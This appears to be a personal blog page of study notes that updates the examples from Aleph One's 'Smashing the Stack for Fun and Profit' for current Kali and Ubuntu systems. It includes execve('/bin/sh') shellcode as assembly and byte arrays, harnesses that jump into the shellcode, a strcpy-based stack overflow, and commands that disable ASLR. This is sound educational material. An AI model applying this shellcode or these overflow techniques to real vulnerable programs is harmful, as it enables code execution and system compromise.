Jithesh Kuyyalil

Notes on "Smashing the Stack for Fun and Profit" by Aleph One.

For example 3 in Aleph One's *Smashing the Stack for Fun and Profit* paper, the offsets in the following code did not work on my Kali Linux 2025.2 system: the patched return address never skipped the `x = 1;` assignment.


        ret = buffer1 + 12; 
        (*ret) += 8;
    

Below is the version that worked on both Kali 2025.2 and Ubuntu 10.04. It was compiled as shown, with address space layout randomization (ASLR) disabled. Note that writing 0 to randomize_va_space disables ASLR for every process on the machine until it is set back to the kernel default of 2.


        # Build 32-bit with debug info (a 64-bit host needs the 32-bit gcc/multilib support installed).
        gcc -o out example3_bof_alphone.c -ggdb -m32
        # Turns off ASLR for every process on the machine (kernel default is 2) so the
        # stack offsets used below are stable between runs.  Set it back to 2 when
        # finished, or run only this binary unrandomized with: setarch $(uname -m) -R ./out
        echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
    

The following code, with offsets of 13 (to reach the saved return address from buffer1) and 8 (the number of bytes to skip past the `x = 1;` store), worked on both systems.


        #include <stdio.h>
        
        /*
         * Aleph One's example 3: overwrite this function's own saved return
         * address so that, when it returns, main() resumes after its "x = 1;"
         * store instead of executing it.
         *
         * buffer1 + 13 is where the saved return address starts on the builds
         * described above (gcc -ggdb -m32, ASLR off); the paper's +12 did not
         * work on Kali 2025.2, as the text notes.  Adding 8 skips the bytes of
         * the "x = 1;" instruction that follows the call in main().  Both
         * numbers are frame-layout and code-generation specific: changing the
         * locals, the compiler flags or main() can invalidate them, so confirm
         * them in gdb rather than editing them.
         *
         * NOTE: this store is deliberately undefined behaviour (an out-of-bounds
         * write through a cast pointer).  If the build inserts a stack canary
         * the write may land on it and abort with "stack smashing detected";
         * -fno-stack-protector would then be needed -- TODO confirm on Kali.
         * a, b, c and buffer2 are never read; they only shape the frame as in
         * the paper.
         */
        void function(int a, int b, int c) {
            char buffer1[5];
            char buffer2[10];
            int *ret;
        
            ret = (int *)(buffer1 + 13);   /* address of the saved EIP on this build */
            (*ret) += 8;                   /* skip the "x = 1;" store in main() */
        
            }
        
        /*
         * Driver for example 3.  If function() patched its return address
         * correctly, execution resumes after "x = 1;" and this prints 0;
         * otherwise it prints 1.  Keep this body exactly as written: the +8
         * in function() is the size of the code it skips here, so any change
         * to main() can shift that offset.  main() falls off the end without
         * a return statement, which C99 treats as returning 0.
         */
        int main() {
            int x;
            x = 0;
            function(1,2,3);
            x = 1;              /* the store the overflow is meant to skip */
            printf("%d\n", x);  /* prints 0 when the skip worked */
        }

    

For shellcodeasm.c, the following formatting of the inline assembly got it working:


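	/*
	 * Aleph One's shellcodeasm.c: execve("/bin/sh", ["/bin/sh", NULL], envp)
	 * followed by exit(0), written so that the "/bin/sh" string is located at
	 * run time by the jmp/call/pop trick (no absolute addresses).  It is built
	 * with gcc -m32 and the opcode bytes are read out of the binary (e.g. with
	 * gdb); those bytes become the shellcode[] arrays further down the page.
	 *
	 * Layout after "popl %esi" (esi = address of "/bin/sh"):
	 *   esi+0x0  "/bin/sh"      the path
	 *   esi+0x7  0x00           NUL terminator, written at run time
	 *   esi+0x8  esi            argv[0] -> "/bin/sh"
	 *   esi+0xc  0x00000000     argv[1] = NULL; also passed as envp
	 *
	 * This version encodes zero bytes (the $0x0 immediates and the 32-bit
	 * $0xb / $0x1 moves), so it cannot be delivered through a strcpy()-style
	 * overflow; shellcodeasm2.c below removes them.  It also writes into the
	 * bytes that follow the string, which sit in .text here, so running this
	 * binary directly will presumably fault on a read-only text segment --
	 * the listing exists to extract opcodes, not to run.  main() never
	 * returns because the final int $0x80 is exit(); it is declared
	 * int main(void) for conformance, matching shellcodeasm2.c below.
	 */
	int main(void){

	__asm__(
	"jmp jmp_here\n\t"
	"call_here:\n\t"
	"popl %esi\n\t"              /* esi = address pushed by call = &"/bin/sh" */
	"movl %esi,0x8(%esi)\n\t"    /* argv[0] = &"/bin/sh" */
	"movb $0x0,0x7(%esi)\n\t"    /* NUL-terminate the path */
	"movl $0x0,0xc(%esi)\n\t"    /* argv[1] = NULL */
	"movl $0xb,%eax\n\t"         /* i386 syscall 11 = execve */
	"movl %esi,%ebx\n\t"         /* ebx = filename */
	"leal 0x8(%esi),%ecx\n\t"    /* ecx = argv */
	"leal 0xc(%esi),%edx\n\t"    /* edx = envp (the NULL word) */
	"int $0x80\n\t"
	"movl $0x1, %eax\n\t"        /* i386 syscall 1 = exit */
	"movl $0x0, %ebx\n\t"        /* status 0 */
	"int $0x80\n\t"
	"jmp_here:\n\t"
	"call call_here\n\t"         /* pushes the address of the string that follows */
	".string \"/bin/sh\"\n\t");
	}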

    

The following testsc.c works on Ubuntu 10.04.


	/* Opcode bytes of shellcodeasm.c (gcc -m32), one literal per instruction.
	 * Offsets are from the start of the array; the jmp/call displacements
	 * (+0x2a and -0x2f) tie the instructions to these exact positions.
	 * This version still contains 0x00 bytes (offsets 9, 13-16, 19-21, 34-36,
	 * 38-41 and the string terminator), so strlen() sees only 9 bytes and a
	 * strcpy()-based delivery would stop there; that is fine for testsc.c,
	 * which jumps to the array directly. */
	char shellcode[] =
		"\xeb\x2a"                         /* 00: jmp  +0x2a -> call at 0x2c */
		"\x5e"                             /* 02: popl %esi                 */
		"\x89\x76\x08"                     /* 03: movl %esi,0x8(%esi)       */
		"\xc6\x46\x07\x00"                 /* 06: movb $0x0,0x7(%esi)       */
		"\xc7\x46\x0c\x00\x00\x00\x00"     /* 0a: movl $0x0,0xc(%esi)       */
		"\xb8\x0b\x00\x00\x00"             /* 11: movl $0xb,%eax            */
		"\x89\xf3"                         /* 16: movl %esi,%ebx            */
		"\x8d\x4e\x08"                     /* 18: leal 0x8(%esi),%ecx       */
		"\x8d\x56\x0c"                     /* 1b: leal 0xc(%esi),%edx       */
		"\xcd\x80"                         /* 1e: int  $0x80 (execve)       */
		"\xb8\x01\x00\x00\x00"             /* 20: movl $0x1,%eax            */
		"\xbb\x00\x00\x00\x00"             /* 25: movl $0x0,%ebx            */
		"\xcd\x80"                         /* 2a: int  $0x80 (exit)         */
		"\xe8\xd1\xff\xff\xff"             /* 2c: call -0x2f -> popl at 0x02 */
		"\x2f\x62\x69\x6e\x2f\x73\x68\x00" /* 31: "/bin/sh\0"               */
		"\x5d\xc3";                        /* 39: pop %ebp; ret -- never reached, presumably the function epilogue captured with the code */

	/*
	 * Run shellcode[] without any overflow: overwrite main()'s own saved
	 * return address with the array's address so that "returning" from main
	 * jumps into it.  &ret + 2 assumes ret is the word just below the saved
	 * EBP (ret at ebp-4, saved ebp at ebp+0, return address at ebp+4 on a
	 * 32-bit frame), and (int)shellcode only holds a whole pointer with -m32.
	 * The page holding shellcode[] must be executable for a shell to appear;
	 * the text reports this working on Ubuntu 10.04, a current toolchain will
	 * likely need an executable-stack / no-NX style build -- TODO confirm.
	 * Frame-layout dependent: do not restyle.
	 */
	int main(){
		int * ret;
		ret = (int *)&ret + 2;      /* -> saved return address of main() */
		(*ret) = (int)shellcode;    /* "return" into the shellcode */
	}

    

The following worked for shellcodeasm2.c.


    /*
     * Zero-free rewrite of shellcodeasm.c: same execve("/bin/sh") + exit(0),
     * but every instruction that used a 32-bit $0x0 / $0xb / $0x1 immediate
     * is replaced by xor / byte-move / inc forms so no 0x00 byte appears in
     * the opcodes.  That matters because the final exploit copies the bytes
     * with strcpy(), which stops at the first NUL.  The "/bin/sh" terminator
     * is still a zero, but it is written at run time (movb %eax,0x7(%esi)),
     * not stored in the shellcode.  The opcode bytes in testsc2.c below are
     * read out of this build, so the instructions must stay as they are;
     * only the label names are cosmetic.
     */
    int main(){

	__asm__(
	"jmp before_call\n\t"
	"before_pop:\n\t"
	"popl %esi\n\t"              /* esi = &"/bin/sh" */
	"movl %esi,0x8(%esi)\n\t"    /* argv[0] */
	"xorl %eax,%eax\n\t"         /* eax = 0 without a 0x00 byte */
	"movb %eax,0x7(%esi)\n\t"    /* NUL-terminate "/bin/sh"; the bytes below show it assembled as movb %al (88 46 07) */
	"movl %eax,0xc(%esi)\n\t"    /* argv[1] = NULL */
	"movb $0xb,%al\n\t"          /* eax = 11 (execve), 2-byte encoding */
	"movl %esi,%ebx\n\t"
	"leal 0x8(%esi),%ecx\n\t"
	"leal 0xc(%esi),%edx\n\t"
	"int $0x80\n\t"
	"xorl %ebx,%ebx\n\t"         /* ebx = 0 (exit status) */
	"movl %ebx,%eax\n\t"
	"inc %eax\n\t"               /* eax = 1 (exit) */
	"int $0x80\n\t"
	"before_call:\n\t"
	"call before_pop\n\t"
	".string \"/bin/sh\"\n\t"
	);
	}
    

Below is the working code for testsc2.c.


   	 /* Opcode bytes of shellcodeasm2.c (gcc -m32), one literal per instruction.
	 * Offsets are from the start of the array; the jmp/call displacements
	 * (+0x1f and -0x24) tie the instructions to these exact positions.
	 * No 0x00 byte occurs before the string terminator at 0x2d, so strlen()
	 * covers all 45 bytes of code and path. */
	char shellcode[] =
		"\xeb\x1f"                         /* 00: jmp  +0x1f -> call at 0x21 */
		"\x5e"                             /* 02: popl %esi                 */
		"\x89\x76\x08"                     /* 03: movl %esi,0x8(%esi)       */
		"\x31\xc0"                         /* 06: xorl %eax,%eax            */
		"\x88\x46\x07"                     /* 08: movb %al,0x7(%esi)        */
		"\x89\x46\x0c"                     /* 0b: movl %eax,0xc(%esi)       */
		"\xb0\x0b"                         /* 0e: movb $0xb,%al             */
		"\x89\xf3"                         /* 10: movl %esi,%ebx            */
		"\x8d\x4e\x08"                     /* 12: leal 0x8(%esi),%ecx       */
		"\x8d\x56\x0c"                     /* 15: leal 0xc(%esi),%edx       */
		"\xcd\x80"                         /* 18: int  $0x80 (execve)       */
		"\x31\xdb"                         /* 1a: xorl %ebx,%ebx            */
		"\x89\xd8"                         /* 1c: movl %ebx,%eax            */
		"\x40"                             /* 1e: inc  %eax                 */
		"\xcd\x80"                         /* 1f: int  $0x80 (exit)         */
		"\xe8\xdc\xff\xff\xff"             /* 21: call -0x24 -> popl at 0x02 */
		"\x2f\x62\x69\x6e\x2f\x73\x68\x00" /* 26: "/bin/sh\0"               */
		"\x4d\xc3";                        /* 2e: trailing bytes after the terminator, never reached (exit runs first) */

	/*
	 * Same harness as testsc.c, now for the zero-free shellcode: overwrite
	 * main()'s saved return address with the array's address so the ret at
	 * the end of main lands in it.  &ret + 2 assumes ret sits at ebp-4 with
	 * the return address at ebp+4 (32-bit frame); (int)shellcode only holds
	 * a whole pointer with -m32.  The page holding shellcode[] must be
	 * executable for a shell to appear -- on a current toolchain that is
	 * unlikely by default; TODO confirm the build flags used.
	 * Frame-layout dependent: do not restyle.
	 */
	int main(){

		int *ret;

		ret = (int *)&ret + 2;      /* -> saved return address of main() */
		(*ret) = (int)shellcode;    /* "return" into the shellcode */
	}
    

I had to increase the size of the large_string array (to 136 bytes, i.e. 34 four-byte words) for the saved return address (RET) to be overwritten, as shown below.


    	#include <stdio.h>
    	#include <string.h>
	/* Opcode bytes of shellcodeasm2.c (gcc -m32), one literal per instruction,
	 * with the path written as plain text.  No 0x00 byte occurs before the
	 * literal's implicit terminator at 0x2d, so strlen() is 45 and the copy
	 * loop in main() moves exactly the code plus "/bin/sh"; the NUL after the
	 * path is not part of the payload -- the code writes it at run time. */
	char shellcode[] =
		"\xeb\x1f"                 /* 00: jmp  +0x1f -> call at 0x21 */
		"\x5e"                     /* 02: popl %esi                 */
		"\x89\x76\x08"             /* 03: movl %esi,0x8(%esi)       */
		"\x31\xc0"                 /* 06: xorl %eax,%eax            */
		"\x88\x46\x07"             /* 08: movb %al,0x7(%esi)        */
		"\x89\x46\x0c"             /* 0b: movl %eax,0xc(%esi)       */
		"\xb0\x0b"                 /* 0e: movb $0xb,%al             */
		"\x89\xf3"                 /* 10: movl %esi,%ebx            */
		"\x8d\x4e\x08"             /* 12: leal 0x8(%esi),%ecx       */
		"\x8d\x56\x0c"             /* 15: leal 0xc(%esi),%edx       */
		"\xcd\x80"                 /* 18: int  $0x80 (execve)       */
		"\x31\xdb"                 /* 1a: xorl %ebx,%ebx            */
		"\x89\xd8"                 /* 1c: movl %ebx,%eax            */
		"\x40"                     /* 1e: inc  %eax                 */
		"\xcd\x80"                 /* 1f: int  $0x80 (exit)         */
		"\xe8\xdc\xff\xff\xff"     /* 21: call -0x24 -> popl at 0x02 */
		"/bin/sh";                 /* 26: the path; implicit NUL at 0x2d */

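	/* Payload buffer: 34 four-byte words (136 bytes) of return address, the
	 * first 45 of which are then overlaid with the shellcode.  One extra byte
	 * is reserved so the array ends in a zero (globals are zero-initialised
	 * and main() writes only 136 bytes): strcpy() then stops at a terminator
	 * that is inside the array instead of reading past its end into whatever
	 * happens to follow in .bss. */
	char large_string[137];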

	/*
	 * Aleph One's overflow1.c: smash main()'s own stack frame.
	 *   1. Fill large_string with 34 copies of buffer's address (34 words =
	 *      136 bytes with -m32, where long is 4 bytes; on an LP64 build long
	 *      is 8 bytes and this loop would itself overrun large_string).
	 *   2. Overlay the first strlen(shellcode) bytes with the shellcode (the
	 *      NUL after "/bin/sh" is not copied; the code writes its own).
	 *   3. strcpy() large_string, up to its NUL terminator, into the 96-byte
	 *      buffer.  The bytes past the end of buffer overwrite the saved
	 *      EBP and return address with buffer's address, so the ret from
	 *      main lands in the shellcode.  The text above says the 128 bytes
	 *      the paper used were not enough here; 136 presumably covers extra
	 *      padding between buffer and the saved EIP on these builds --
	 *      check the frame in gdb if no shell appears.
	 * Requirements the code does not set: gcc -m32, ASLR off, an executable
	 * stack and no stack-protector canary; on a current toolchain that
	 * means something like -z execstack -fno-stack-protector -- TODO confirm.
	 * (int) buffer truncates a pointer on a 64-bit build.  Everything here
	 * depends on the exact frame layout; do not restyle.
	 */
	int main(){

		 char buffer[96];
		 int i;

		 long * long_ptr = (long *) large_string;

		 for (i=0; i<34; i++)
			 *(long_ptr + i) = (int) buffer;     /* 34 * 4 = 136 bytes of return address */

		 for (i=0; i < strlen(shellcode); i++)
			 large_string[i] = shellcode[i];     /* shellcode first, addresses after it */

		 strcpy(buffer, large_string);          /* the overflow: > 96 bytes into buffer */

	}

    

Contact Me: jithesh82 AT G mail